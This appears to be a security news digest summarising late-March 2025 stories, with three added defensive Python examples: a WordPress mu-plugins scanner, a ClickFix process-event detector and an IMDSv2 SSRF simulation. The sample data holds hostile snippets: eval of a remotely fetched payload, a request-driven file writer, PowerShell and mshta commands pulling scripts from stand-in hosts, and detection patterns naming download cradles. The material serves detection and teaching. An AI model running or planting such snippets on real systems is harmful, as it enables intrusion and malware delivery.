Daily Brief
Find articles below, see 'DETAILS' for generated summaries
Total articles found: 11827
Checks for new stories every ~15 minutes
| Date | Source | Category | Title | Summary | |
|---|---|---|---|---|---|
| 2025-03-31 23:21:32 | theregister | NATION STATE ACTIVITY | FBI Raids Home of Noted Cybersecurity Professor and Wife | FBI agents searched the homes of Xiaofeng Wang, a cybersecurity professor at Indiana University, and his wife Nianli Ma in Bloomington and Carmel, Indiana.
Indiana University removed Wang's profile from its website after the searches and reportedly terminated his position.
It is unclear whether Wang and Ma are in custody; they are thought to have possibly left the country around the time of the searches.
The searches are part of an undisclosed federal investigation; the FBI confirmed court-authorized activity at both addresses but gave no details.
Local police assisted only with scene security, indicating the investigation is federally led.
Wang has a prestigious academic record and has received substantial research funding, placing him among the more prominent figures in the field.
The nature of the investigation remains speculative, though it invites comparison with earlier U.S. scrutiny of foreign-born academics.
Neighbors described a dramatic scene, with agents loudly announcing their presence and carrying multiple boxes of evidence out of the properties. | Details |
| 2025-03-31 21:36:14 | theregister | DATA BREACH | Oracle Faces Severe Data Breach, Denial, and Evidence Scrubbing Claims | Oracle has been accused of two major breaches affecting its cloud services while publicly denying any compromise.
An attacker claimed to have accessed data belonging to six million Oracle Cloud customers, including security-sensitive information.
The intrusion allegedly exploited CVE-2021-35587, a long-patched Oracle Access Manager flaw that was reportedly still unpatched on a production Oracle Cloud login server.
Independent security firms have confirmed with affected customers that samples of the leaked data are genuine and include personal and security data of Oracle clients.
Separately, Oracle Health is linked to a potential patient-data breach that the FBI is investigating.
Security experts criticized Oracle's lack of transparency, warning it could erode customer trust and loyalty.
Oracle is also alleged to have asked the Internet Archive to remove archived evidence of the breach from the Wayback Machine. | Details |
| 2025-03-31 19:58:13 | bleepingcomputer | CYBERCRIME | Microsoft AI Uncovers New Vulnerabilities in Popular Bootloaders | Microsoft's AI-powered Security Copilot identified 20 new vulnerabilities across three widely used bootloaders: GRUB2, U-Boot, and Barebox.
The flaws are mostly buffer and integer overflows; the GRUB2 ones affect systems that rely on UEFI Secure Boot.
GRUB2, the default bootloader for most Linux distributions, accounts for 11 of the flaws, which could be chained to bypass Secure Boot, install bootkits, and undermine protections such as BitLocker that depend on a trusted boot chain.
U-Boot and Barebox, common in embedded and IoT devices, account for the other 9; exploiting them requires physical access to the device.
Successful exploitation gives an attacker full control of the boot process and a foothold for persistent malware.
Because a bootkit runs before the operating system, it can survive OS reinstallation or even hardware replacement, and it can serve as a beachhead for wider network compromise.
Microsoft said the AI-assisted workflow saved roughly a week of manual analysis in finding these bugs.
The GRUB2, U-Boot, and Barebox projects released fixes in February 2025; the flaws are mitigated once those updates are applied. | Details |
| 2025-03-31 18:50:18 | bleepingcomputer | CYBERCRIME | Lucid Phishing Platform Targets Global Entities via SMS | A Phishing-as-a-Service (PhaaS) platform called Lucid is developed and operated by the XinXin group, a collective of Chinese cybercriminals.
Lucid has targeted 169 organizations across 88 countries with smishing campaigns delivered over iMessage and RCS rather than plain SMS.
Subscribers get access to more than 1,000 phishing domains and professional-grade sending tools, sold on a subscription basis through a dedicated Telegram channel.
The platform automates generation of customizable phishing sites and mass distribution through mobile messaging; iMessage and RCS are used because those channels bypass carrier SMS spam filtering.
Impersonated brands include USPS, FedEx, Amazon, and numerous banks, with the goal of harvesting personal and payment-card data.
Lucid lets operators validate stolen card numbers, and cards that pass are used directly or resold.
Operators practice their own operational security, potentially running campaigns from vehicles on mobile devices to reduce traceability and evade law enforcement.
Lucid's scale and polish illustrate how PhaaS lowers the barrier to entry and raises both success rates and reach for cybercriminals. | Details |
| 2025-03-31 17:11:05 | bleepingcomputer | MALWARE | Rising Abuse of WordPress MU-Plugins by Hackers Uncovered | Attackers are increasingly using the WordPress mu-plugins directory to hide malicious code on compromised sites.
Sucuri first documented the technique in February 2025: anything in wp-content/mu-plugins is loaded automatically on every page load, with no activation step and no entry in the normal plugin list.
Sucuri found three types of payload in the directory, aimed at data theft, redirecting visitors, and injecting further malicious code.
Hosting the code in mu-plugins gives the attacker persistence and makes the infection harder to spot and remove.
Initial access typically comes through vulnerable plugins or themes, or weak administrator credentials.
Sucuri recommends keeping themes and plugins updated, removing unused extensions, and hardening admin accounts with strong passwords and multi-factor authentication.
The trend reflects criminals targeting core mechanisms of popular content management systems like WordPress for financial gain. | Details |
| 2025-03-31 16:48:52 | thehackernews | NATION STATE ACTIVITY | Russian Hackers Deploy Malware Using Sophisticated Techniques | Water Gamayun, a suspected Russian threat actor, exploited a zero-day vulnerability in the Microsoft Management Console to deploy malware, including the SilentPrism and DarkWisp backdoors.
Delivery relies on provisioning packages, signed .msi installers, and .msc console files, typically disguised as legitimate software.
SilentPrism and DarkWisp provide persistent access, command execution, and data exfiltration, with evasion features designed to defeat detection.
The group also deploys information stealers to harvest extensive personal and system data, with a marked interest in cryptocurrency-related material.
Water Gamayun now uses its own infrastructure for both payload staging and command-and-control, tightening control over its campaigns.
Its toolkit mixes commodity and custom stealers able to collect detailed system and user information.
EncryptHub, another name for the same actor, previously distributed malware through a malicious GitHub repository and a fake WinRAR website. | Details |
| 2025-03-31 16:41:16 | theregister | DATA BREACH | Check Point Data Breach Claims Questioned Amidst Misinformation | A user on a cybercrime forum claimed to have obtained highly sensitive Check Point data, including internal network maps, user credentials, and proprietary source code.
Check Point says the data is old, the incident was handled at the time, and it involved a single account with limited access and no impact on customer systems.
The seller, posting under the handle CoreInjection, advertised the data with screenshots purportedly showing access to the admin interface of Check Point's Infinity portal.
Hudson Rock CTO Alon Gal initially judged the claims credible but later accepted that the scope was probably narrower than advertised.
Check Point maintains that the material is recycled old data and poses no risk to customers or employees.
The underlying incident dates from December, when credentials for a restricted-access portal account were compromised; three organizations were affected.
Check Point stresses that customer systems, production environments, and its security architecture were not compromised. | Details |
| 2025-03-31 15:59:26 | bleepingcomputer | NATION STATE ACTIVITY | North Korean Hackers Target Crypto Firms with ClickFix Malware | North Korea's Lazarus group has adopted ClickFix tactics to deliver malware to job seekers in the cryptocurrency industry.
ClickFix presents a fake error or verification prompt on a website or in a document and instructs the victim to "fix" it by pasting a command, typically PowerShell, into a terminal or the Windows Run dialog, so the victim executes the malware themselves.
Lazarus impersonates well-known crypto companies such as Coinbase and KuCoin and lures targets with fake job interviews.
In this "ClickFake Interview" campaign the focus shifts from developers to non-technical roles in crypto firms, and the fake fix is tailored to the victim's operating system.
Victims end up infected with the GolangGhost backdoor, which can collect system metadata and perform file operations on the host.
Sekoia's analysis shows Lazarus running ClickFake alongside its earlier Contagious Interview campaign, suggesting the group is evaluating both approaches.
Organizations should verify interview invitations and never paste commands from web pages into a terminal; Sekoia has published detection rules and a list of indicators of compromise. | Details |
| 2025-03-31 12:12:40 | thehackernews | MALWARE | Hackers Covertly Use WordPress mu-Plugins to Inject Spam and Malware | Threat actors are abusing the WordPress mu-plugins directory to run malicious code that grants persistent access and redirects visitors to attacker-controlled sites.
Must-use plugins (mu-plugins) are loaded automatically on every request, cannot be deactivated from the dashboard, and do not appear in the normal plugin list, so routine checks overlook them; that obscurity makes the directory attractive for malware.
Sucuri identified three families of rogue PHP in mu-plugins, including one that redirects visitors under the guise of a browser update.
The scripts check the User-Agent and skip the redirect for search-engine crawlers, so the site keeps a clean reputation in search results while continuing to attack human visitors.
Compromised WordPress sites are also being used to push Lumma Stealer through fake CAPTCHA "verification" pages.
Likely entry points include vulnerable plugins or themes, exposed admin credentials, and server misconfiguration.
Recommended mitigations are regular plugin and theme updates, periodic code audits of wp-content, strong password policies, and a web application firewall to block exploitation attempts and data exfiltration. | Details |
| 2025-03-31 11:34:18 | thehackernews | CYBERCRIME | Google Fixes Chrome Zero-Day Exploited in Targeted Attacks | Google patched a high-severity Chrome vulnerability (CVE-2025-2783) that was being exploited in the wild against Russian organizations.
The flaw let attackers escape Chrome's sandbox and execute code on the host after the victim opened a specially crafted link delivered by phishing email.
A related sandbox-escape flaw was subsequently found and patched in Mozilla Firefox and the Tor Browser.
The episode underscores the persistence of browser-targeting threats and the need to apply updates promptly.
Recommendations also include disabling browser autofill for sensitive fields, which limits what an attacker can harvest from a compromised browser session.
The report highlights how attackers abuse everyday conveniences to gain a foothold in otherwise well-protected systems, which argues for continuous vigilance. | Details |
| 2025-03-31 11:06:55 | thehackernews | MISCELLANEOUS | Key Insights on Customer Responsibilities for AWS Security | AWS operates a Shared Responsibility Model: AWS secures the cloud itself, and customers secure what they run in it.
Application-layer flaws such as Server-Side Request Forgery (SSRF) live in customer code and can be used to reach internal services, including the instance metadata endpoint, so they demand careful access control and data protection.
AWS Identity and Access Management (IAM) is the core control, but it only limits access if the customer designs least-privilege policies and configures it correctly.
Customers alone are responsible for patching the operating system and applications on their EC2 instances.
AWS does not secure customer data or applications; customers must ensure their storage configuration and access paths do not expose data.
Customers must also manage their own network controls (security groups, firewalls) and attack surface even though AWS secures the underlying infrastructure.
Cloud security scanners such as Intruder can help cover the customer side of the Shared Responsibility Model. | Details |
| 2025-03-31 10:01:30 | theregister | MISCELLANEOUS | Key Strategies for Enhancing Security in AWS Cloud Environments | AWS operates a Shared Responsibility Model that divides security obligations between AWS and its customers.
Customers must safeguard their data, applications, and configurations in AWS, while AWS secures the underlying infrastructure.
Real-world examples cited include SSRF flaws that let an attacker coerce a server into making requests on their behalf and gain unauthorized access to data.
Enforcing IMDSv2 on EC2 instances (a session token obtained with a PUT request and supplied on every metadata request) blunts the classic SSRF-to-credential-theft path, alongside fixing the application flaw itself.
Customers should apply precise configurations and access controls to avoid data exposure, particularly for S3 buckets and RDS database connections.
Customers handle OS and application patching themselves; AWS maintains the underlying hardware, firmware, and hypervisor.
Securing network configuration, through firewalls, VPNs, and tight ingress rules, protects against unauthorized access and limits exposure to zero-day flaws in applications.
Intruder offers cloud security scanning and vulnerability management tools that help organizations maintain a robust security posture in AWS environments. | Details |
| 2025-03-31 09:38:38 | thehackernews | NATION STATE ACTIVITY | Russian-Linked Gamaredon Targets Ukraine with Phishing to Deploy RAT | Ukrainian targets are being hit by a phishing campaign that uses file names referencing troop movements to deliver the Remcos remote access trojan.
The attacks are attributed to Gamaredon, a Russian group believed to operate on behalf of Russia's FSB.
Gamaredon uses malicious Windows shortcut (.lnk) files disguised as Microsoft Office documents to trick victims into launching them.
The shortcuts arrive in ZIP archives and run a PowerShell downloader that contacts servers in Russia and Germany.
The downloader retrieves a second stage that uses DLL side-loading to execute the Remcos payload.
The same report describes a separate phishing campaign, impersonating the CIA, the Russian Volunteer Corps, and others, that aims to collect data on Russian individuals.
Those campaigns all use website lures to collect sensitive personal information. | Details |
| 2025-03-31 00:34:03 | theregister | DATA BREACH | China Intensifies Enforcement of Privacy Laws; Global Tech Updates | China has launched a strict enforcement campaign, led by several government agencies, against illegal collection and use of personal data.
The enforcement targets non-government entities and sits alongside the state's own extensive surveillance of its citizens.
Indonesia has lifted its ban on the iPhone 16, conditional on Apple's commitment to build a local R&D facility.
New Indonesian rules restrict social media access for users under 18 and require parental oversight when minors create accounts.
More than 20 Japanese semiconductor companies have formed an alliance to pool resources and compete globally.
Japan Airlines trialed an AI system that lets cabin crew produce flight reports using offline language processing.
India's ISRO successfully tested a new rocket engine design intended to increase payload capacity for upcoming missions, including a crewed spaceflight. | Details |
| 2025-03-30 22:50:59 | theregister | DATA BREACH | Oracle Health Reports Data Leak from Legacy Server | Oracle Health, formed from Oracle's 2022 acquisition of Cerner, suffered unauthorized access to patient data.
Attackers used stolen customer credentials to pull patient information from a legacy Cerner server that had not yet been migrated to Oracle Cloud.
Oracle has notified affected customers, and the FBI is reportedly investigating, including possible extortion demands.
In other news: OpenAI raised its maximum bug bounty payout from $20,000 to $100,000 to attract high-impact security research.
A survey found that more than half of IT professionals delay applying software patches, leaving systems exposed to known exploits.
The reviewdog GitHub Action was compromised, causing secrets to be written into GitHub Actions workflow logs.
INTERPOL's Operation Red Card led to 306 arrests across seven African countries, targeting mobile banking and other scams. | Details |
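The two WordPress mu-plugins entries above (Sucuri's February 2025 finding and the follow-up) describe what the rogue files do but not how to find them. The script below is an added example, not code from Sucuri, WordPress or either article: it reads every PHP file under wp-content/mu-plugins and flags the indicators those write-ups describe (eval of a decoded payload, remote payload fetches, writing request data to disk, User-Agent cloaking against crawlers, redirects to external sites, long base64 blobs). The sample files, domain names and the rule list are constructed for illustration, and the rules are triage heuristics rather than a verdict: a legitimate mu-plugin can redirect or fetch a URL, so every hit still needs a human look.

```python
"""
Audit a WordPress mu-plugins directory for the indicators in the Sucuri write-ups.

Added example; not code from Sucuri, WordPress or either article. The sample
files, domain names and rule list are constructed for illustration.
"""
import re
from pathlib import Path

# Each rule: (label, compiled regex). Tuned for PHP dropped into wp-content/mu-plugins.
RULES = [
    ("eval of decoded payload",
     re.compile(r"\beval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)", re.I)),
    ("code execution primitive",
     re.compile(r"\b(assert|create_function|system|shell_exec|passthru|proc_open)\s*\(", re.I)),
    ("remote payload fetch",
     re.compile(r"\b(file_get_contents|curl_init|fopen)\s*\(\s*['\"]https?://", re.I)),
    ("writes request data to disk",
     re.compile(r"file_put_contents\s*\([^;]*\$_(GET|POST|REQUEST|COOKIE)", re.I | re.S)),
    ("crawler cloaking",
     re.compile(r"HTTP_USER_AGENT[^;]*(googlebot|bingbot|crawler|spider)", re.I | re.S)),
    ("redirect to external site",
     re.compile(r"(header\s*\(\s*['\"]Location:\s*|wp_redirect\s*\(\s*['\"])https?://", re.I)),
    ("long base64 blob", re.compile(r"[A-Za-z0-9+/=]{120,}")),
]


def audit_source(src: str) -> list[str]:
    """Return the labels of every rule that fires on one PHP file's contents, in RULES order."""
    return [label for label, rx in RULES if rx.search(src)]


def audit_mu_plugins(files: dict[str, str]) -> dict[str, list[str]]:
    """Map file name -> fired rules, keeping only files that tripped at least one rule."""
    report = {}
    for name, src in files.items():
        hits = audit_source(src)
        if hits:
            report[name] = hits
    return report


def load_mu_plugins(wp_content: str) -> dict[str, str]:
    """Read every .php file under <wp_content>/mu-plugins, recursively, because a
    loader stub in the top level often includes code from a subdirectory."""
    root = Path(wp_content) / "mu-plugins"
    return {str(p.relative_to(root)): p.read_text(errors="replace") for p in root.rglob("*.php")}


# Constructed sample directory contents: not real malware and not real site code.
SAMPLE_FILES = {
    "site-tweaks.php": "<?php\nadd_filter('xmlrpc_enabled', '__return_false');\n",
    "index.php": (
        "<?php\n$p = file_get_contents('https://cdn.example-bad.test/p.txt');\n"
        "eval(base64_decode($p));\n"
    ),
    "redirect.php": (
        "<?php\nif (stripos($_SERVER['HTTP_USER_AGENT'], 'googlebot') === false) {\n"
        "  header('Location: https://update-browser.example-bad.test/');\n  exit;\n}\n"
    ),
    "uploader.php": "<?php\nfile_put_contents(__DIR__ . '/' . $_GET['f'], $_POST['d']);\n",
    "packed.php": "<?php\n$b = '" + "QUJD" * 40 + "';\n",
}

if __name__ == "__main__":
    # Against a live site: audit_mu_plugins(load_mu_plugins("/var/www/html/wp-content"))
    for name, hits in audit_mu_plugins(SAMPLE_FILES).items():
        print(f"{name}: {', '.join(hits)}")
```

Run it against `load_mu_plugins("/path/to/wp-content")` on a suspect site; the benign `site-tweaks.php` sample produces no hits, while each of the other samples trips the rule for the behaviour it mimics. Pair the scan with a file-modification-time check, since attackers rarely bother to backdate dropped files.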
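The Lazarus ClickFix entry above describes the trick (a fake prompt that gets the victim to paste a PowerShell command) but not what it looks like in endpoint telemetry. The following is an added example, not from Sekoia, BleepingComputer or any vendor: a small scorer over process-creation events that rewards the combination ClickFix produces, namely a script host launched from an interactive parent such as explorer.exe (the Win+R dialog) with a download cradle, inline execution, a hidden window, or a "verification" lure string in the command line. The event records are constructed; their field names follow the common Sysmon Event ID 1 fields (ParentImage, Image, CommandLine) but are assumptions, and the weights and threshold are a starting heuristic, not a tuned rule.

```python
"""
Score Windows process-creation events for ClickFix-style execution.

Added example, not from Sekoia, BleepingComputer or any vendor. The events
below are constructed; field names (ParentImage, Image, CommandLine) mirror
Sysmon Event ID 1 but are assumed, not taken from a real log.
"""
import re

LAUNCHERS = ("powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe")
# ClickFix pastes land in Win+R (child of explorer.exe) or a terminal the user opened by hand.
INTERACTIVE_PARENTS = ("explorer.exe", "windowsterminal.exe", "conhost.exe")

# (label, weight, regex) applied to the command line.
INDICATORS = [
    ("download cradle", 3, re.compile(
        r"\b(irm|iwr|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|curl|certutil)\b", re.I)),
    ("inline execution", 3, re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    ("encoded command", 2, re.compile(r"\s-(e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("hidden window", 1, re.compile(r"\s-(w|win|window|windowstyle)\s+hidden\b", re.I)),
    ("mshta remote script", 3, re.compile(r"mshta(\.exe)?\s+\"?https?://", re.I)),
    ("verification lure string", 2, re.compile(r"i am not a robot|verify you are human|captcha|fix it", re.I)),
]


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def score_event(event: dict) -> tuple[int, list[str]]:
    """Return (score, reasons) for one process-creation event.
    Non-script-host images score 0 immediately; the parent contributes 2 when interactive."""
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    if image not in LAUNCHERS:
        return 0, []
    score, reasons = 0, []
    if parent in INTERACTIVE_PARENTS:
        score += 2
        reasons.append(f"launched from {parent}")
    for label, weight, rx in INDICATORS:
        if rx.search(cmd):
            score += weight
            reasons.append(label)
    return score, reasons


def flag_clickfix(events, threshold: int = 6) -> list[tuple[str, int, list[str]]]:
    """Return (command line, score, reasons) for every event at or above the threshold."""
    flagged = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            flagged.append((ev.get("CommandLine", ""), score, reasons))
    return flagged


# Constructed sample events: one scheduled admin script, two ClickFix-style pastes,
# and a developer running iex on a local file (scores below the threshold).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm https://verify.example-bad.test/fix.ps1) '
                    '# I am not a robot - reCAPTCHA Verification ID: 7811"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://captcha.example-bad.test/v.hta"},
    {"ParentImage": r"C:\Program Files\WindowsApps\Microsoft.WindowsTerminal\WindowsTerminal.exe",
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": r'pwsh -c "iex (Get-Content .\build.ps1 -Raw)"'},
]

if __name__ == "__main__":
    for cmd, score, reasons in flag_clickfix(SAMPLE_EVENTS):
        print(f"[{score}] {cmd}\n    {', '.join(reasons)}")
```

The threshold is deliberately above "interactive parent plus one indicator" so that an engineer running `iex` on a local script is not paged, while a paste that downloads and executes from the Run dialog is. In production the same logic maps onto a Sigma or EDR rule keyed on the parent image and command-line substrings; the lure-string indicator is the most fragile and should be refreshed from current ClickFix samples.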
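The two AWS entries above recommend enforcing IMDSv2 to blunt SSRF but do not show why it helps. The simulation below is an added example, not code from AWS or either article: a minimal model of the instance metadata service in both modes, a typical SSRF primitive (the application fetches an attacker-supplied URL with a plain GET and cannot set the method or headers), and the legitimate SDK flow. Hostnames, paths, the fake credential string and all function names are assumptions for illustration; the real service listens at http://169.254.169.254 on the instance.

```python
"""
Simulated IMDSv1 vs IMDSv2 behaviour against an SSRF primitive.

Added example; constructed simulation, not code from AWS or the article.
The credential value is fake. Function and class names are assumptions.
"""
import secrets
import time
from dataclasses import dataclass, field
from typing import Optional

IMDS_HOST = "169.254.169.254"
CRED_PATH = "/latest/meta-data/iam/security-credentials/app-role"
TOKEN_PATH = "/latest/api/token"
# Constructed fake credential; never a real key.
FAKE_CREDS = '{"AccessKeyId":"ASIAEXAMPLE","SecretAccessKey":"example"}'


@dataclass
class FakeIMDS:
    """Minimal model of the instance metadata service.

    http_tokens mirrors the EC2 instance setting:
      "optional" = IMDSv1 still answers plain GETs (the legacy default)
      "required" = IMDSv2 only: every GET must carry a session token
    """
    http_tokens: str = "optional"
    _tokens: dict = field(default_factory=dict)  # token -> expiry (epoch seconds)

    def request(self, method: str, path: str, headers: Optional[dict] = None) -> tuple[int, str]:
        headers = {k.lower(): v for k, v in (headers or {}).items()}
        if method == "PUT" and path == TOKEN_PATH:
            ttl = headers.get("x-aws-ec2-metadata-token-ttl-seconds")
            if ttl is None:
                return 400, "missing TTL header"
            token = secrets.token_urlsafe(32)
            self._tokens[token] = time.time() + int(ttl)
            return 200, token
        if method != "GET":
            return 405, "method not allowed"
        token = headers.get("x-aws-ec2-metadata-token")
        if token is not None:
            expiry = self._tokens.get(token)
            if expiry is None or expiry < time.time():
                return 401, "invalid or expired token"
        elif self.http_tokens == "required":
            return 401, "IMDSv2 token required"
        if path == CRED_PATH:
            return 200, FAKE_CREDS
        return 404, "not found"


def vulnerable_fetch(imds: FakeIMDS, url: str) -> tuple[int, str]:
    """Typical SSRF primitive: the app fetches a user-supplied URL with a plain
    GET and returns the body. The attacker controls the URL but not the method
    or headers, which is exactly the property IMDSv2's PUT-for-token step relies on."""
    host, _, path = url.removeprefix("http://").partition("/")
    if host != IMDS_HOST:
        return 502, "simulation only routes to the metadata host"
    return imds.request("GET", "/" + path)


def legitimate_client(imds: FakeIMDS) -> tuple[int, str]:
    """What the SDK does under IMDSv2: PUT for a session token, then GET with it."""
    status, token = imds.request(
        "PUT", TOKEN_PATH, {"X-aws-ec2-metadata-token-ttl-seconds": "21600"})
    if status != 200:
        return status, token
    return imds.request("GET", CRED_PATH, {"X-aws-ec2-metadata-token": token})


def ssrf_leaks_credentials(http_tokens: str) -> bool:
    """True if an SSRF GET to the credentials path returns the credential body."""
    imds = FakeIMDS(http_tokens=http_tokens)
    status, body = vulnerable_fetch(imds, f"http://{IMDS_HOST}{CRED_PATH}")
    return status == 200 and body == FAKE_CREDS


if __name__ == "__main__":
    print("IMDSv1 allowed  -> SSRF leaks creds:", ssrf_leaks_credentials("optional"))
    print("IMDSv2 required -> SSRF leaks creds:", ssrf_leaks_credentials("required"))
    print("IMDSv2 required -> SDK flow status :", legitimate_client(FakeIMDS("required"))[0])
```

On a real instance the equivalent enforcement is `aws ec2 modify-instance-metadata-options --instance-id <id> --http-tokens required --http-endpoint enabled`, and `describe-instances` exposes the current setting under `MetadataOptions.HttpTokens` for auditing a fleet. IMDSv2 does not fix the SSRF itself: an SSRF that lets the attacker choose the method and add headers (or a gopher-style primitive) can still obtain a token, so the application flaw still needs patching, and the default hop limit of 1 is what keeps containers on the instance from obtaining tokens through the host's network stack.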